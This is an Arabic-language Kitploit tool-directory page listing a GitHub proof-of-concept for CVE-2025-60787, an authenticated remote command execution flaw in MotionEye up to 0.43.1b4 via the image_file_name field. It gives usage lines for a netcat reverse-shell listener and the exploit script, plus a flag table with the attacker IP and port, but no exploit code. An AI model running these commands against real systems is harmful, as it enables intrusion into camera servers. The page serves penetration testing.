Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-60787_PoC — استغلال RCE مُوثَّق لـ MotionEye <= 0.43.1b4 عبر تجاوز التحقق من صحة العميل على حقل image_file_name. يتضمن تسليم حمولة الصدفة العكسية. | Kitploit
أدوات/GitHubGitHub/lil0xplorer/cve-2025-60787_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHublil0xplorer/cve-2025-60787_poc

CVE-2025-60787_PoC

استغلال RCE مُوثَّق لـ MotionEye <= 0.43.1b4 عبر تجاوز التحقق من صحة العميل على حقل image_file_name. يتضمن تسليم حمولة الصدفة العكسية.

عرض المستودع
21منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-60787 - تنفيذ الأوامر عن بُعد في MotionEye

ثغرة تنفيذ أوامر عن بُعد (RCE) مصادق عليها في MotionEye <= 0.43.1b4 عبر تجاوز التحقق من جهة العميل في حقل image_file_name.

الاستخدام

root@kitploit:~
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444

العلامات

العلامةالوصف
-tالمضيف/الرابط الهدف (الافتراضي المنفذ 8765)
-uاسم المستخدم (الافتراضي: admin)
-pكلمة المرور - نفس القيمة التي تدخلها في الواجهة الرسومية / موجودة في motion.conf
-lhعنوان IP للمهاجم
-lpمنفذ الاستماع
--camera-idمعرف الكاميرا (يتم اكتشافه تلقائيًا إذا تم حذفه)
تنزيل الأداة